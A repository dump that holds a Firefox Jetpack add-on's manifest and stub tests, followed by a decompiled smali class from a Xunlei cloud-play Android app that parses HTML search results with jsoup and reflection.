--------------------------------------------------------------------------------
1 | {
2 | "title": "device mode toggle",
3 | "name": "devicemodetoggle",
4 | "version": "1.0.0",
5 | "description": "a simple device mode toggle tool",
6 | "main": "index.js",
7 | "author": "yaseng@uauc.net",
8 | "homepage" : "http://www.yaseng.org",
9 | "icon": "resource://@devicemodetoggle/data/icon-48.png",
10 | "engines": {
11 | "firefox": ">=38.0a1",
12 | "fennec": ">=38.0a1"
13 | },
14 | "license": "MIT",
15 | "keywords": [
16 | "jetpack"
17 | ]
18 | }
19 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/test/test-index.js:
--------------------------------------------------------------------------------
1 | var main = require("../");
2 |
3 | exports["test main"] = function(assert) {
4 | assert.pass("Unit test running!");
5 | };
6 |
7 | exports["test main async"] = function(assert, done) {
8 | assert.pass("async Unit test running!");
9 | done();
10 | };
11 |
12 | exports["test dummy"] = function(assert, done) {
13 | main.dummy("foo", function(text) {
14 | assert.ok((text === "foo"), "Is the text actually 'foo'");
15 | done();
16 | });
17 | };
18 |
19 | require("sdk/test").run(exports);
20 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/g.smali:
--------------------------------------------------------------------------------
1 | .class public Lcom/xunlei/cloud/action/search/g;
2 | .super Ljava/lang/Object;
3 | .source "SnifferParser.java"
4 |
5 |
6 | # static fields
7 | .field public static a:Lcom/xunlei/cloud/util/af;
8 |
9 |
10 | # direct methods
11 | .method static constructor ()V
12 | .locals 2
13 |
14 | .prologue
15 | .line 28
16 | new-instance v0, Lcom/xunlei/cloud/util/af;
17 |
18 | const-class v1, Lcom/xunlei/cloud/action/search/g;
19 |
20 | invoke-direct {v0, v1}, Lcom/xunlei/cloud/util/af;->(Ljava/lang/Class;)V
21 |
22 | sput-object v0, Lcom/xunlei/cloud/action/search/g;->a:Lcom/xunlei/cloud/util/af;
23 |
24 | .line 213
25 | return-void
26 | .end method
27 |
28 | .method public constructor ()V
29 | .locals 0
30 |
31 | .prologue
32 | .line 27
33 | invoke-direct {p0}, Ljava/lang/Object;->()V
34 |
35 | return-void
36 | .end method
37 |
38 | .method private static a(Ljava/lang/String;I)Ljava/lang/String;
39 | .locals 3
40 | .parameter
41 | .parameter
42 |
43 | .prologue
44 | .line 366
45 | new-instance v0, Ljava/util/Locale;
46 |
47 | const-string v1, "en"
48 |
49 | const-string v2, "US"
50 |
51 | invoke-direct {v0, v1, v2}, Ljava/util/Locale;->(Ljava/lang/String;Ljava/lang/String;)V
52 |
53 | .line 367
54 | packed-switch p1, :pswitch_data_0
55 |
56 | .line 380
57 | :goto_0
58 | return-object p0
59 |
60 | .line 369
61 | :pswitch_0
62 | invoke-virtual {p0, v0}, Ljava/lang/String;->toUpperCase(Ljava/util/Locale;)Ljava/lang/String;
63 |
64 | move-result-object p0
65 |
66 | goto :goto_0
67 |
68 | .line 373
69 | :pswitch_1
70 | invoke-virtual {p0, v0}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
71 |
72 | move-result-object p0
73 |
74 | goto :goto_0
75 |
76 | .line 367
77 | nop
78 |
79 | :pswitch_data_0
80 | .packed-switch 0x1
81 | :pswitch_0
82 | :pswitch_1
83 | .end packed-switch
84 | .end method
85 |
86 | .method private static a(Ljava/lang/String;II)Ljava/lang/String;
87 | .locals 2
88 | .parameter
89 | .parameter
90 | .parameter
91 |
92 | .prologue
93 | .line 318
94 | add-int/lit8 v0, p1, 0x0
95 |
96 | .line 319
97 | invoke-virtual {p0}, Ljava/lang/String;->length()I
98 |
99 | move-result v1
100 |
101 | sub-int/2addr v1, p2
102 |
103 | .line 320
104 | if-le v0, v1, :cond_0
105 |
106 | .line 321
107 | const/4 v0, 0x0
108 |
109 | .line 325
110 | :goto_0
111 | return-object v0
112 |
113 | .line 324
114 | :cond_0
115 | invoke-virtual {p0, v0, v1}, Ljava/lang/String;->substring(II)Ljava/lang/String;
116 |
117 | move-result-object v0
118 |
119 | goto :goto_0
120 | .end method
121 |
122 | .method private static a(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
123 | .locals 2
124 | .parameter
125 | .parameter
126 | .parameter
127 |
128 | .prologue
129 | .line 312
130 | new-instance v0, Ljava/lang/StringBuilder;
131 |
132 | invoke-direct {v0}, Ljava/lang/StringBuilder;->()V
133 |
134 | .line 313
135 | invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
136 |
137 | move-result-object v1
138 |
139 | invoke-virtual {v1, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
140 |
141 | move-result-object v1
142 |
143 | invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
144 |
145 | .line 314
146 | invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
147 |
148 | move-result-object v0
149 |
150 | return-object v0
151 | .end method
152 |
153 | .method private static a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
154 | .locals 4
155 | .parameter
156 | .parameter
157 | .parameter
158 | .parameter
159 | .parameter
160 | .parameter
161 | .parameter
162 |
163 | .prologue
164 | const/4 v2, 0x0
165 |
166 | const/4 v0, 0x0
167 |
168 | const/4 v3, -0x1
169 |
170 | .line 332
171 | if-eqz p1, :cond_1
172 |
173 | .line 345
174 | :cond_0
175 | :goto_0
176 | const-string v1, ""
177 |
178 | .line 346
179 | if-eqz p4, :cond_2
180 |
181 | .line 347
182 | invoke-virtual {p2}, Ljava/lang/String;->length()I
183 |
184 | move-result v1
185 |
186 | add-int/2addr v0, v1
187 |
188 | invoke-virtual {p0, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;
189 |
190 | move-result-object v0
191 |
192 | .line 361
193 | :goto_1
194 | return-object v0
195 |
196 | .line 335
197 | :cond_1
198 | invoke-virtual {p0, p2}, Ljava/lang/String;->indexOf(Ljava/lang/String;)I
199 |
200 | move-result v1
201 |
202 | .line 336
203 | if-ne v1, v3, :cond_5
204 |
205 | .line 337
206 | if-eqz p3, :cond_0
207 |
208 | move-object v0, v2
209 |
210 | .line 338
211 | goto :goto_1
212 |
213 | .line 349
214 | :cond_2
215 | invoke-virtual {p0, p5, v0}, Ljava/lang/String;->indexOf(Ljava/lang/String;I)I
216 |
217 | move-result v1
218 |
219 | .line 350
220 | if-ne v1, v3, :cond_4
221 |
222 | .line 351
223 | if-eqz p6, :cond_3
224 |
225 | move-object v0, v2
226 |
227 | .line 352
228 | goto :goto_1
229 |
230 | .line 354
231 | :cond_3
232 | invoke-virtual {p2}, Ljava/lang/String;->length()I
233 |
234 | move-result v1
235 |
236 | add-int/2addr v0, v1
237 |
238 | invoke-virtual {p0, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;
239 |
240 | move-result-object v0
241 |
242 | goto :goto_1
243 |
244 | .line 357
245 | :cond_4
246 | invoke-virtual {p2}, Ljava/lang/String;->length()I
247 |
248 | move-result v2
249 |
250 | add-int/2addr v0, v2
251 |
252 | invoke-virtual {p0, v0, v1}, Ljava/lang/String;->substring(II)Ljava/lang/String;
253 |
254 | move-result-object v0
255 |
256 | goto :goto_1
257 |
258 | :cond_5
259 | move v0, v1
260 |
261 | goto :goto_0
262 | .end method
263 |
264 | .method private static a(Lorg/jsoup/nodes/Element;Lcom/xunlei/cloud/action/search/SnifferField0;)Ljava/lang/String;
265 | .locals 9
266 | .parameter
267 | .parameter
268 | .annotation build Landroid/annotation/SuppressLint;
269 | value = {
270 | "UseSparseArrays"
271 | }
272 | .end annotation
273 |
274 | .annotation system Ldalvik/annotation/Throws;
275 | value = {
276 | Ljava/lang/NoSuchMethodException;,
277 | Ljava/lang/IllegalArgumentException;,
278 | Ljava/lang/IllegalAccessException;,
279 | Ljava/lang/reflect/InvocationTargetException;
280 | }
281 | .end annotation
282 |
283 | .prologue
284 | const/4 v7, 0x0
285 |
286 | const/4 v8, 0x1
287 |
288 | const/4 v6, 0x0
289 |
290 | .line 219
291 | const-class v1, Lorg/jsoup/nodes/Element;
292 |
293 | .line 223
294 | iget-object v0, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_opera:Ljava/lang/String;
295 |
296 | .line 224
297 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_para:Ljava/lang/String;
298 |
299 | .line 225
300 | invoke-virtual {v2}, Ljava/lang/String;->trim()Ljava/lang/String;
301 |
302 | move-result-object v3
303 |
304 | invoke-virtual {v3}, Ljava/lang/String;->length()I
305 |
306 | move-result v3
307 |
308 | if-nez v3, :cond_1
309 |
310 | .line 226
311 | new-array v3, v6, [Ljava/lang/Class;
312 |
313 | invoke-virtual {v1, v0, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
314 |
315 | move-result-object v0
316 |
317 | .line 227
318 | new-array v3, v6, [Ljava/lang/Object;
319 |
320 | invoke-virtual {v0, p0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
321 |
322 | move-result-object v0
323 |
324 | check-cast v0, Lorg/jsoup/select/Elements;
325 |
326 | .line 233
327 | :goto_0
328 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
329 |
330 | move-result v3
331 |
332 | if-eq v3, v8, :cond_2
333 |
334 | .line 234
335 | new-instance v0, Ljava/lang/StringBuilder;
336 |
337 | const-string v1, "[extractString] elementList.size() != 1, getElementPara = "
338 |
339 | invoke-direct {v0, v1}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
340 |
341 | invoke-virtual {v0, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
342 |
343 | move-result-object v0
344 |
345 | invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
346 |
347 | move-result-object v0
348 |
349 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
350 |
351 | move-object v0, v7
352 |
353 | .line 308
354 | :cond_0
355 | :goto_1
356 | return-object v0
357 |
358 | .line 229
359 | :cond_1
360 | new-array v3, v8, [Ljava/lang/Class;
361 |
362 | const-class v4, Ljava/lang/String;
363 |
364 | aput-object v4, v3, v6
365 |
366 | invoke-virtual {v1, v0, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
367 |
368 | move-result-object v0
369 |
370 | .line 230
371 | new-array v3, v8, [Ljava/lang/Object;
372 |
373 | aput-object v2, v3, v6
374 |
375 | invoke-virtual {v0, p0, v3}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
376 |
377 | move-result-object v0
378 |
379 | check-cast v0, Lorg/jsoup/select/Elements;
380 |
381 | goto :goto_0
382 |
383 | .line 239
384 | :cond_2
385 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->first()Lorg/jsoup/nodes/Element;
386 |
387 | move-result-object v0
388 |
389 | .line 243
390 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_opera:Ljava/lang/String;
391 |
392 | .line 244
393 | iget-object v3, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_para:Ljava/lang/String;
394 |
395 | .line 245
396 | invoke-virtual {v3}, Ljava/lang/String;->trim()Ljava/lang/String;
397 |
398 | move-result-object v4
399 |
400 | invoke-virtual {v4}, Ljava/lang/String;->length()I
401 |
402 | move-result v4
403 |
404 | if-nez v4, :cond_4
405 |
406 | .line 246
407 | new-array v3, v6, [Ljava/lang/Class;
408 |
409 | invoke-virtual {v1, v2, v3}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
410 |
411 | move-result-object v1
412 |
413 | .line 247
414 | new-array v2, v6, [Ljava/lang/Object;
415 |
416 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
417 |
418 | move-result-object v0
419 |
420 | check-cast v0, Ljava/lang/String;
421 |
422 | .line 252
423 | :goto_2
424 | if-eqz v0, :cond_3
425 |
426 | invoke-virtual {v0}, Ljava/lang/String;->length()I
427 |
428 | move-result v1
429 |
430 | if-nez v1, :cond_5
431 |
432 | :cond_3
433 | move-object v0, v7
434 |
435 | .line 253
436 | goto :goto_1
437 |
438 | .line 249
439 | :cond_4
440 | new-array v4, v8, [Ljava/lang/Class;
441 |
442 | const-class v5, Ljava/lang/String;
443 |
444 | aput-object v5, v4, v6
445 |
446 | invoke-virtual {v1, v2, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
447 |
448 | move-result-object v1
449 |
450 | .line 250
451 | new-array v2, v8, [Ljava/lang/Object;
452 |
453 | aput-object v3, v2, v6
454 |
455 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
456 |
457 | move-result-object v0
458 |
459 | check-cast v0, Ljava/lang/String;
460 |
461 | goto :goto_2
462 |
463 | .line 258
464 | :cond_5
465 | new-instance v1, Ljava/util/HashMap;
466 |
467 | invoke-direct {v1}, Ljava/util/HashMap;->()V
468 |
469 | .line 259
470 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_trim:I
471 |
472 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
473 |
474 | move-result-object v2
475 |
476 | const-string v3, "order_trim"
477 |
478 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
479 |
480 | .line 260
481 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_append:I
482 |
483 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
484 |
485 | move-result-object v2
486 |
487 | const-string v3, "order_append"
488 |
489 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
490 |
491 | .line 261
492 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_middle:I
493 |
494 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
495 |
496 | move-result-object v2
497 |
498 | const-string v3, "order_middle"
499 |
500 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
501 |
502 | .line 262
503 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->order_case:I
504 |
505 | invoke-static {v2}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
506 |
507 | move-result-object v2
508 |
509 | const-string v3, "order_case"
510 |
511 | invoke-interface {v1, v2, v3}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
512 |
513 | .line 263
514 | new-instance v2, Ljava/util/TreeMap;
515 |
516 | invoke-direct {v2, v1}, Ljava/util/TreeMap;->(Ljava/util/Map;)V
517 |
518 | .line 264
519 | invoke-interface {v2}, Ljava/util/Map;->entrySet()Ljava/util/Set;
520 |
521 | move-result-object v1
522 |
523 | invoke-interface {v1}, Ljava/util/Set;->iterator()Ljava/util/Iterator;
524 |
525 | move-result-object v8
526 |
527 | :cond_6
528 | :goto_3
529 | invoke-interface {v8}, Ljava/util/Iterator;->hasNext()Z
530 |
531 | move-result v1
532 |
533 | if-eqz v1, :cond_0
534 |
535 | invoke-interface {v8}, Ljava/util/Iterator;->next()Ljava/lang/Object;
536 |
537 | move-result-object v1
538 |
539 | check-cast v1, Ljava/util/Map$Entry;
540 |
541 | .line 268
542 | invoke-interface {v1}, Ljava/util/Map$Entry;->getKey()Ljava/lang/Object;
543 |
544 | move-result-object v2
545 |
546 | check-cast v2, Ljava/lang/Integer;
547 |
548 | invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
549 |
550 | move-result v2
551 |
552 | const/4 v3, -0x1
553 |
554 | if-eq v2, v3, :cond_6
555 |
556 | .line 272
557 | invoke-interface {v1}, Ljava/util/Map$Entry;->getValue()Ljava/lang/Object;
558 |
559 | move-result-object v1
560 |
561 | check-cast v1, Ljava/lang/String;
562 |
563 | .line 273
564 | const-string v2, "order_trim"
565 |
566 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
567 |
568 | move-result v2
569 |
570 | if-eqz v2, :cond_7
571 |
572 | .line 275
573 | iget v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_trim_num_head:I
574 |
575 | iget v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_trim_num_tail:I
576 |
577 | invoke-static {v0, v1, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;II)Ljava/lang/String;
578 |
579 | move-result-object v0
580 |
581 | .line 277
582 | if-nez v0, :cond_6
583 |
584 | .line 278
585 | const-string v0, "[extractString] after trim data = null"
586 |
587 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
588 |
589 | move-object v0, v7
590 |
591 | .line 279
592 | goto/16 :goto_1
593 |
594 | .line 281
595 | :cond_7
596 | const-string v2, "order_append"
597 |
598 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
599 |
600 | move-result v2
601 |
602 | if-eqz v2, :cond_8
603 |
604 | .line 283
605 | iget-object v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_append_head:Ljava/lang/String;
606 |
607 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->element_data_append_tail:Ljava/lang/String;
608 |
609 | invoke-static {v0, v1, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
610 |
611 | move-result-object v0
612 |
613 | .line 285
614 | if-nez v0, :cond_6
615 |
616 | .line 286
617 | const-string v0, "[extractString] after add data == null"
618 |
619 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
620 |
621 | move-object v0, v7
622 |
623 | .line 287
624 | goto/16 :goto_1
625 |
626 | .line 289
627 | :cond_8
628 | const-string v2, "order_middle"
629 |
630 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
631 |
632 | move-result v2
633 |
634 | if-eqz v2, :cond_b
635 |
636 | .line 292
637 | iget-object v2, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_head:Ljava/lang/String;
638 |
639 | .line 293
640 | iget-object v5, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_tail:Ljava/lang/String;
641 |
642 | .line 294
643 | invoke-virtual {v2}, Ljava/lang/String;->length()I
644 |
645 | move-result v1
646 |
647 | if-nez v1, :cond_9
648 |
649 | invoke-virtual {v5}, Ljava/lang/String;->length()I
650 |
651 | move-result v1
652 |
653 | if-eqz v1, :cond_a
654 |
655 | .line 295
656 | :cond_9
657 | iget-boolean v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_from_begin:Z
658 |
659 | iget-boolean v3, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_head_must:Z
660 |
661 | .line 296
662 | iget-boolean v4, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_until_end:Z
663 |
664 | iget-boolean v6, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->extract_middle_tail_must:Z
665 |
666 | .line 295
667 | invoke-static/range {v0 .. v6}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
668 |
669 | move-result-object v0
670 |
671 | .line 298
672 | :cond_a
673 | if-nez v0, :cond_6
674 |
675 | .line 299
676 | const-string v0, "[extractString] after middle data == null"
677 |
678 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
679 |
680 | move-object v0, v7
681 |
682 | .line 300
683 | goto/16 :goto_1
684 |
685 | .line 302
686 | :cond_b
687 | const-string v2, "order_case"
688 |
689 | invoke-virtual {v1, v2}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
690 |
691 | move-result v1
692 |
693 | if-eqz v1, :cond_6
694 |
695 | .line 304
696 | iget v1, p1, Lcom/xunlei/cloud/action/search/SnifferField0;->the_case:I
697 |
698 | invoke-static {v0, v1}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
699 |
700 | move-result-object v0
701 |
702 | goto/16 :goto_3
703 | .end method
704 |
705 | .method public static a(Lcom/xunlei/cloud/action/search/Sniffer;Ljava/lang/String;)Ljava/util/ArrayList;
706 | .locals 9
707 | .parameter
708 | .parameter
709 | .annotation system Ldalvik/annotation/Signature;
710 | value = {
711 | "(",
712 | "Lcom/xunlei/cloud/action/search/Sniffer;",
713 | "Ljava/lang/String;",
714 | ")",
715 | "Ljava/util/ArrayList",
716 | "<",
717 | "Lcom/xunlei/cloud/action/search/SnifferData;",
718 | ">;"
719 | }
720 | .end annotation
721 |
722 | .annotation system Ldalvik/annotation/Throws;
723 | value = {
724 | Ljava/io/IOException;,
725 | Ljava/lang/NoSuchMethodException;,
726 | Ljava/lang/IllegalArgumentException;,
727 | Ljava/lang/IllegalAccessException;,
728 | Ljava/lang/reflect/InvocationTargetException;,
729 | Ljava/lang/NoSuchFieldException;,
730 | Ljava/lang/SecurityException;
731 | }
732 | .end annotation
733 |
734 | .prologue
735 | const/4 v7, 0x1
736 |
737 | const/4 v6, 0x0
738 |
739 | .line 162
740 | new-instance v3, Ljava/util/ArrayList;
741 |
742 | invoke-direct {v3}, Ljava/util/ArrayList;->()V
743 |
744 | .line 165
745 | invoke-static {p1}, Lorg/jsoup/Jsoup;->parse(Ljava/lang/String;)Lorg/jsoup/nodes/Document;
746 |
747 | move-result-object v0
748 |
749 | .line 167
750 | const-class v1, Lorg/jsoup/nodes/Document;
751 |
752 | .line 168
753 | iget-object v2, p0, Lcom/xunlei/cloud/action/search/Sniffer;->select_row_opera_0:Ljava/lang/String;
754 |
755 | new-array v4, v7, [Ljava/lang/Class;
756 |
757 | const-class v5, Ljava/lang/String;
758 |
759 | aput-object v5, v4, v6
760 |
761 | invoke-virtual {v1, v2, v4}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
762 |
763 | move-result-object v1
764 |
765 | .line 169
766 | new-array v2, v7, [Ljava/lang/Object;
767 |
768 | iget-object v4, p0, Lcom/xunlei/cloud/action/search/Sniffer;->select_row_para_0:Ljava/lang/String;
769 |
770 | aput-object v4, v2, v6
771 |
772 | invoke-virtual {v1, v0, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
773 |
774 | move-result-object v0
775 |
776 | check-cast v0, Lorg/jsoup/select/Elements;
777 |
778 | .line 171
779 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
780 |
781 | move-result v1
782 |
783 | if-nez v1, :cond_0
784 |
785 | .line 172
786 | const-string v0, "[parser0] rowList.size() == 0"
787 |
788 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
789 |
790 | move-object v0, v3
791 |
792 | .line 207
793 | :goto_0
794 | return-object v0
795 |
796 | .line 176
797 | :cond_0
798 | new-instance v1, Ljava/lang/StringBuilder;
799 |
800 | const-string v2, "[parser0] \u627e\u591a\u5c11\u884c\u9700\u8981\u89e3\u6790 = "
801 |
802 | invoke-direct {v1, v2}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
803 |
804 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->size()I
805 |
806 | move-result v2
807 |
808 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
809 |
810 | move-result-object v1
811 |
812 | invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
813 |
814 | move-result-object v1
815 |
816 | invoke-static {v1}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
817 |
818 | .line 178
819 | invoke-virtual {v0}, Lorg/jsoup/select/Elements;->iterator()Ljava/util/Iterator;
820 |
821 | move-result-object v4
822 |
823 | :cond_1
824 | :goto_1
825 | invoke-interface {v4}, Ljava/util/Iterator;->hasNext()Z
826 |
827 | move-result v0
828 |
829 | if-nez v0, :cond_2
830 |
831 | .line 205
832 | new-instance v0, Ljava/lang/StringBuilder;
833 |
834 | const-string v1, "[parser0] \u55c5\u63a2\u51fa\u7684\u4e2a\u6570\u662f\uff1a "
835 |
836 | invoke-direct {v0, v1}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
837 |
838 | invoke-virtual {v3}, Ljava/util/ArrayList;->size()I
839 |
840 | move-result v1
841 |
842 | invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
843 |
844 | move-result-object v0
845 |
846 | invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
847 |
848 | move-result-object v0
849 |
850 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
851 |
852 | move-object v0, v3
853 |
854 | .line 207
855 | goto :goto_0
856 |
857 | .line 178
858 | :cond_2
859 | invoke-interface {v4}, Ljava/util/Iterator;->next()Ljava/lang/Object;
860 |
861 | move-result-object v0
862 |
863 | check-cast v0, Lorg/jsoup/nodes/Element;
864 |
865 | .line 179
866 | new-instance v5, Lcom/xunlei/cloud/action/search/SnifferData;
867 |
868 | invoke-direct {v5}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
869 |
870 | .line 180
871 | const-class v6, Lcom/xunlei/cloud/action/search/SnifferData;
872 |
873 | .line 182
874 | iget-object v1, p0, Lcom/xunlei/cloud/action/search/Sniffer;->field_list_0:Ljava/util/ArrayList;
875 |
876 | invoke-virtual {v1}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
877 |
878 | move-result-object v7
879 |
880 | :cond_3
881 | :goto_2
882 | invoke-interface {v7}, Ljava/util/Iterator;->hasNext()Z
883 |
884 | move-result v1
885 |
886 | if-nez v1, :cond_4
887 |
888 | .line 199
889 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
890 |
891 | if-eqz v0, :cond_1
892 |
893 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
894 |
895 | invoke-virtual {v0}, Ljava/lang/String;->length()I
896 |
897 | move-result v0
898 |
899 | if-eqz v0, :cond_1
900 |
901 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
902 |
903 | if-eqz v0, :cond_1
904 |
905 | iget-object v0, v5, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
906 |
907 | invoke-virtual {v0}, Ljava/lang/String;->length()I
908 |
909 | move-result v0
910 |
911 | if-eqz v0, :cond_1
912 |
913 | .line 200
914 | invoke-virtual {v3, v5}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
915 |
916 | goto :goto_1
917 |
918 | .line 182
919 | :cond_4
920 | invoke-interface {v7}, Ljava/util/Iterator;->next()Ljava/lang/Object;
921 |
922 | move-result-object v1
923 |
924 | check-cast v1, Lcom/xunlei/cloud/action/search/SnifferField0;
925 |
926 | .line 184
927 | invoke-static {v0, v1}, Lcom/xunlei/cloud/action/search/g;->a(Lorg/jsoup/nodes/Element;Lcom/xunlei/cloud/action/search/SnifferField0;)Ljava/lang/String;
928 |
929 | move-result-object v2
930 |
931 | .line 185
932 | if-eqz v2, :cond_3
933 |
934 | .line 190
935 | iget-object v8, v1, Lcom/xunlei/cloud/action/search/SnifferField0;->class_field_name:Ljava/lang/String;
936 |
937 | const-string v9, "title"
938 |
939 | invoke-virtual {v8, v9}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
940 |
941 | move-result v8
942 |
943 | if-eqz v8, :cond_5
944 |
945 | .line 191
946 | invoke-static {v2}, Lcom/xunlei/cloud/action/search/g;->d(Ljava/lang/String;)Ljava/lang/String;
947 |
948 | move-result-object v2
949 |
950 | .line 194
951 | :cond_5
952 | iget-object v1, v1, Lcom/xunlei/cloud/action/search/SnifferField0;->class_field_name:Ljava/lang/String;
953 |
954 | invoke-virtual {v6, v1}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
955 |
956 | move-result-object v1
957 |
958 | .line 195
959 | invoke-virtual {v1, v5, v2}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V
960 |
961 | goto :goto_2
962 | .end method
963 |
964 | .method public static a(Ljava/lang/String;)Ljava/util/ArrayList;
965 | .locals 15
966 | .parameter
967 | .annotation system Ldalvik/annotation/Signature;
968 | value = {
969 | "(",
970 | "Ljava/lang/String;",
971 | ")",
972 | "Ljava/util/ArrayList",
973 | "<",
974 | "Lcom/xunlei/cloud/action/search/SnifferData;",
975 | ">;"
976 | }
977 | .end annotation
978 |
979 | .prologue
980 | const/4 v2, 0x1
981 |
982 | const/4 v3, 0x0
983 |
984 | .line 77
985 | new-instance v4, Ljava/util/ArrayList;
986 |
